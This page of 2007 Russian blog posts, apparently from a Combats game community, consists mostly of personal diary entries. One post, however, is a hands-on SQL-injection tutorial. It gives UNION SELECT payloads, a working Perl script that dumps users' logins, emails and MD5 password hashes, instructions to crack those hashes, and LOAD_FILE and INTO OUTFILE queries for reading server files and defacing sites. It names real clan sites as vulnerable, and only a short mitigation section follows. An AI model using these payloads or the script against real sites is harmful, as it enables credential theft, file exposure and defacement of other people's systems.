|
16.06.07 10:56 |
Лизка   | О том, как я опозорилась. |
ru |
Вчера, после очередного экзамена (на 4 сдалась), одногруппники потащили в Гидропарк (киевский, так сказать, центр развлечений), чтобы заценить кафешку, в которой будем отмечать окончание сессии. Выяснилось, что у них там можно петь под караоке. Лучше бы мне этого не говорили.
В общем, придумала, какую песню хочу спеть - у них её не оказалось... так, я перебрала штук 5 всяко-разных песен, но репертуарчик у них скудненький, поэтому пришлось петь хотя бы что-то, от чего меня не тошнит и что у них есть. Зря я так подумала. Выбрала, умная девочка, песню с очень высокими нотами и... опозорилась... наверное:)) Всё это дело записали на фотик. Потом послушаю, чё я там нафальшивила. И если не побоюсь позора и критики, выложу сюда.
Пела "Город 312 - Останусь".. Сбилась там посреди песни. Так переволновалась, что забыла о проигрыше:))
На публике пела первый раз в жизни. Пусть и не так хорошо, как хотелось бы, но всё-таки переступила через один из своих комплексов.
ЗЫ. Потом спела ещё одну песню, но там вообще не моя тональная категория была... даже вспоминать не хочу:)
Mood: сонное Music: слушаю, как обычно, что-то по радио.
|
| Comments: 8 | |
| |
|
|
| 16.06.07 03:55 |
чиппи-гламур | защити себя сам |
ru |
Для примера использован сайт клана Cossacks Of Hell
В связи с последними событиями в БК , я решил провести исследования клансайтов ..
К сожалению , как оказалось , большая часть подвержена серьезным уязвимостям..Я хочу рассказать вам и сберечь вас от наиболее распространенных..
Как оказалось 80% просмотренных мною клансайтов имеют схожие уязвимости - сиквэл инъекции , что далеко не странно , тк у программистов не хватает больше ума как использовать стандартные проверки в скриптах при обращении к реляционной базе данных..Зачем думать головой , если можно содрать уже написанное ? =))
Зачастую , о наличии сиквэл инъекции могут сказать ошибки , явно указывающие, что произошла ошибка в sql запросе. В тоже время о наличии ошибки в сиквэл запросе можно судить и по косвенным признакам ..
Чтобы реализовать наш с вами взлом давайте найдем параметр , значения которого передаются в запросе к БД.. Это достаточно просто , как правило это может быть параметр для обращения к новостной ленте , галлерии , списку статей , панели регестрации итд ..
структура такого запроса
http://site/test.php?id=номер статьи или новости
естественно , любой нормальный человек , увидев такое в строке запроса или в сорсе кода начнет сУвать туда всякую херь =)
http://site/test.php?id=9999
http://site/test.php?id=ааа
http://site/test.php?id=0
http://site/test.php?id=-0
http://site/test.php?id=-1000
итд
в 10 сайтах , уже на этом этапе я получил ошибку , связанную с неверным сиквэл запросом
Некоторые программисты наивно полагают , что их спасет заключение параметра в одиночные ковычки - ' и ошибочная фильтрация символов.. бугага =)
что-нить типо
<?php
$param=preg_replace("/[a-zA-Z0-9]i","",$param);
?php>
---------------------------------------------------------------------------
если исследуя скрипт выше мы еще не получили ошибки , продолжим =))
http://site/test.php?id=-1'+/*
таким нехитрым маневром мы закрываем первую кавычку и ставим незакрытый сиквэл комментарий , который превращает следующий в запросе код в бесполезную информацию.
вуаля =))
*
Следует отметить , что вы можете и не получать вывод ошибочного запроса , но если в результате ковыряния параметра вы получаете редирект на главную страницу , или еще лучше страницу с пустым запросом или 500 ошибкой шттп - вы на верном пути и правильно выбрали атакуемый параметр ..
*
Дальше можно было бы и не писать ничего , если бы я не сомневался в профессионализме прогеров ..
далее начинаем подбирать верный запрос к таблице , туд , методом перебора выясняется номер столбца с выводом. Нам понадобится знать, в каком по счету столбце происходит вывод на страницу
http://site/test.php?id=-1'+union+select+null/*
если и такой запрос выдаст ошибку синтаксиса или пустую страницу , значит в скрипте, возможно имеется проверка на не пустоту одного из параметров ...
тогда идем конём ..
http://site/test.php?id=-1'+union+select+1/*
еееееее
http://site/test.php?id=-1'+union+select+1,2,3 итд/*
http://site/test.php?id=-1'+union+select+null,null,null,null,null,null,null/*
или если фильтруется пробуем
http://site/test.php?id=-1'+union+select+1,2,3,4,5,6,7/*
вуаля =))
Теперь можно перебирать имена таблиц .. Правильные запросы будут соответствовать существующим именам таблиц .. Наверно , интересно будет проверить на существование таблиц users , passwords , regusers и тд и тп ..
Если выводиться только одна строка из запроса (например , вместо тела статьи) , то можно передвигаться по строкам путем limit ..
http://site/test.php?id=-1'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,1/*
вуаля =))
*отдельно стоит рассказать про сиквэл функцию char() .. в качестве аргумента она принимает десятичный код ASCII символа , это нужно в том случае , когда скриптом фильтруются нужные символы...
например char(47) вернет нам / , когда если бы мы отослали его напрямую этот символ бы отфильтровался ..
*
Итак - мы имеем пароли в мд5 , логины и почтовые ящики пользователей .. (n делить на два , потом n деленное на два разделить на два итд)
Методом мат. анализа определяем , что записей в phpbb_forum тут 489 .. Анализируем сорс ошибки..
и пишем несложный скрипт на перле
не люблю я пхп =))
#!/usr/bin/perl -w
use LWP;
use strict;
my $ua=LWP::UserAgent->new;
my $i;
my $res;
$path='путь к уязвимости=-1\'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit';
for ($i=1;$i<=488;$i++) {
my $res=$ua->request(HTTP::Request->new(GET=>$path.'+'."$i".',1/*'));
if ($res->is_success) {
$res->content=~/<center>Запрещено просматривать статью '(.*):(.*):(.*)'/;
open (LOG,">>list") || die " cant open file";
print LOG $1.':'.$2.':'.$3."\n";
close LOG;
} else {
print $res->status_line;
}
}
В кратце - используем модуль лвл для последовательного гет запроса ко всем строкам таблицы , выделяем из сорса нужные тэги , а из них в свою очередь - логины , пароли и мэйлы ..
вуаля =))
в фале list , в одной корневой со скриптом через 2 мин у нас вся база данных сайта =))
кидаем пароли клана на подбор в любую утилиту для штурма мд5
и вуаля , через минуту у нас уже пасс от одного соклана ..
а еще через два дня , от половины
но какого же будет ваше удивление , когда в ответ на инъекцию
http://site/test.php?id=-1'+union+select+1,LOAD_FILE(''),3,4,5,6,7/*
вы получите
сайтик то , на винде стоит , а это увеличивает полет фантазии вдвое
нам на самом деле и не нужны пароли , их можно и не качать ..
Достаточно написать что - нить типа
http://site/test.php?id=-1'+union+select+1,LOAD_FILE('путь к любому файлу на диске C:\'),3,4,5,6,7/*
для просмотра любого скрипта
и
http://site/test.php?id=-1'+union+select+1,'',2,3,4,5,6,7+from+phpbb_forum+into+outfile+'C:\usr\local\site\www\index.php'/*
для дефейса .. те подмены главной страницы .. да и вообще стереть любой файл можно ..
или закачать свое ..
Похожие уязвимости я нашел почти на всех топ клан сайтах ..
Даркклан , рмиб и пачке других..
Попытаться исправить это можно путем
- для целых и дробных величин , перед их использованием в запросе надо привести величину к нужному типу ..
$id=(int)$id; $total=(float)$total;
Вместо этого можно вставить систему слежения за тестированием на сиквэл инъекцию ..
if((string)$id<>(string)(int)$id) {
// пишем в лог о попытке ..
die('ops');
}
- для строковых параметров , которые не используются в like , regexp и тд , экранируем кавычки ..
$str=addslashes($str);
или , лучше я всегда советовал
mysql_escape_string($str)
- в строках , которые предполагается использовать внутри like , regexp и тд , необходимо так же заэкранировать специальные символы , применяющиеся в этих операторах , если это необходимо.. В противном случае , можно задокументировать использование этих символов ..
На прощание хочу сказать - никогда не ждите благодарностей от людей..
удачи , и помните - если жизнь свернула вас как удав , терпите =)))
hacked by 4
hacked by RaD
отдельное спасибо Diogen-у
|
| Comments: 19 | |
| |
|
|
| 14.06.07 21:02 |
Менестрелъ Ночи | Клоун. |
ru |
http://capitalcity.combats.ru/forum.pl?id=1181837895&n=index - такой вот клоун появился сегодня на форуме.
УБИЙЦА_МАГОВ [10] (14.06.07 20:22)
> Менестрелъ Ночи [9]
Ты пес нетральный воще тихо сиди я вас не уважаю воще вы то за тьму то за свет как шестерки то там подстелитесть то там где команда сильней.... так што тихо сиди
УБИЙЦА_МАГОВ [10] (14.06.07 20:26)
> Менестрелъ Ночи [9]
> нифига себе наезды))) а ты в курсе, что свои слова надо
> отвечать? А то получить можно
Что опять побежыш инкам ж.....пу полижеш что б за тя прилетели или как?
Ну нормально так. Кончилась для человека игра :)
Update: 14-06-07 23:02
УБИЙЦА_МАГОВ [10] (14.06.07 21:16)
> Менестрелъ Ночи [9]
Ну тут мазя такая елси ваш клан играет за тьму но я канешно ивиняюсь за то что оскорблял вашых сокланов которые как дураки заступаютсо за свет.... ну а если вы за свет то какать я хотел на тебя с твоими извинениями .... ВОТ МОЯ ПОЗИЦЫЯ
ну хоть что-то :)))
|
| Comments: 1 | |
| |
|
|
| 14.06.07 19:19 |
Лизка | Итоги безскрольных дней. |
ru |
Не помню, с какого момента скроллы перестали работать. У меня сложилось впечатления, что это длилось целую вечность. За эти дни:
1. Съездила к маме, посмотрела на собанек! Это просто бомба, а не собаки:) Такие клёвые-клёвые:) Мама какое-то время назад говорила, что подлечит их и, возможно, будет искать им новых хозяев (ей тяжело с животными после Долли..). Но я решительно настроена собак оставить.. если не маме, то себе. Позже выложу их фотки:)
2. Ещё у мамы на балконе где-то с 2 месяца назад свили гнездо голуби:) И неделю назад вылупились очаровательные голубята. На них я вчера тоже посмотрела - здорово. Правда, уже вымахали за неделю здоровенные. Фотки тоже потом закину:)
3. У меня дома пустил стрелку и обзавёлся бутонами калач!!! У меня никогда в жизни не цвели комнатные растения. Как правило, умирали либо от пересыхания, либо от передозировки водой. В какой-то степени я собой горжусь. При том, как я цветы люблю, у меня раньше никогда не получалось правильно за ними ухаживать.
В общем, так у меня обстояли дела эту вечность:) До связи, немногочисленные мои дорогие читатели!;)
Mood: позитивное
|
| Comments: 6 | |
| |
|
|
| 14.06.07 18:49 |
Лизка | Посоветуйте... |
ru |
Вот думаю украшение купить.. зацените:
CUT: Продолжение
Mood: вопросительное
|
| Comments: 30 | |
| |
|
|
| 14.06.07 18:40 |
Лизка | Продаю чувство юмора. Недорого. Приватик. |
ru |
18:08 [ФРЕЯ] to [Rual Ilmarranen] как дела, сарделька?
18:11 [Rual Ilmarranen] to [ФРЕЯ] на 15 минут хватит?
18:12 [ФРЕЯ] to [Rual Ilmarranen] 15 мин за ковер?
18:13 [Rual Ilmarranen] to [ФРЕЯ] ща кляп из того ковра поставлю)
18:13 [ФРЕЯ] to [Rual Ilmarranen] лучше жж кастуй за ковер))
18:15 [Rual Ilmarranen] to [ФРЕЯ] могу жж -5. Хотя не, не могу. темная не прокачана))
18:16 [Лизка] Кастую клаустрофобию. Приватик.
14.06.07 18:19 Тарман "Жженый" наложил заклятие молчания на "Лизка", сроком 30 минут
Тяжело, наверное, без ч/ю живётся...
Mood: удивлённое
|
| Comments: 4 | |
| |
|
|
| 14.06.07 16:38 |
Менестрелъ Ночи | Избранные |
ru |
Создавал уже на форуме подобную тему, потому что скроллы не работали.
Вам в кайф поливать всех грязью чтоли? Что ни новость, так столько желчи по отношению почти ко всем.
А все началось с того, что нашего в Яндексе новость о моем топе про "Музей БК". "Засоренный флудом мозг" - замечательно. Спасибо. А еще наткнулся на новость про нашу статью о заработке в пещерах с вашим комментарием "А кое-кто знает больше". Так почему бы вам самим не написать, а?
В таком случае я никому не скажу, что новости вы писать не умеете как следует. Не скажу, что вы заливаете на свой сайт картинки в *.bmp, не скажу, что в одной из первых новостей ссылки на картинки ведут на сталков, хотя копирайта на них нет. И с картинками на ОС такая же ситуация...
|
| Comments: 1 | |
| |
|
|
| 13.06.07 00:03 |
Крошли Ню | Путинскому посвящаеться)) |
ru |
ММуууууууууууууууууууууууууууууууууууууурк)) И много примного хугоФФ:)
Mood: влюбчивое 
|
| Comments: 5 | |
| |
|
|
| 12.06.07 23:59 |
ландыши | Активное руководство :) |
ru |
Вот блин повезло... за сутки не сделано ничего практически.
Спасибо активно "помогающему" руководству :))
Очень повезло, что некоторые сервисы по крайней мере частично поддаются правке через написанные мной ресурсы :)
Mood: эмо Music: Diam's - Petite Banlieusarde
|
|
| |
|
|
| 12.06.07 14:23 |
Менестрелъ Ночи | БК - Площадь Трех Вокзалов. |
ru |
Помните, кто-то говорил, мол, БК стал похож на реал? Люди стали хамить друг другу, оскорблять, потеряли всякое уважение к другим игрокам и т.п. Клуб давно перерос границы реала и создал нечто свое, новое. Сейчас Клуб - это мир, где давно нет разницы между добром и злом. Это мир, где людям плевать, говоришь ты правду или врешь. Это мир, где игроку плевать, что о нем думают окружающие: жажда быть круче всех и жажда новой цифры у ника - вот что правит сейчас людьми в Клубе.
ЗДЕСЬ ЕСТЬ ПРОДОЛЖЕНИЕ: Продолжение
|
| Comments: 3 | |
| |
|
Total posts: 3222 Pages: 323
1.. 10.. 20.. 30.. 40.. 50.. 60.. 70.. 80.. 90.. 100.. 110.. 120.. 130.. 140.. 150.. 160.. 170.. 180.. 190.. 200.. 210.. 220.. 230.. 240.. 250.. 260.. 270.. 280.. 289 290 291 292 293 294 295 296 297 298 299 300.. 310.. 320..
|
|
| Mo |
Tu |
We |
Th |
Fr |
Sa |
Su |
| | | 1 | 2 | 3 | 4 | | 5 | 6 | 7 | 8 | 9 | 10 | 11 | | 12 | 13 | 14 | 15 | 16 | 17 | 18 | | 19 | 20 | 21 | 22 | 23 | 24 | 25 | | 26 | 27 | 28 | 29 | 30 | 31 | |
|
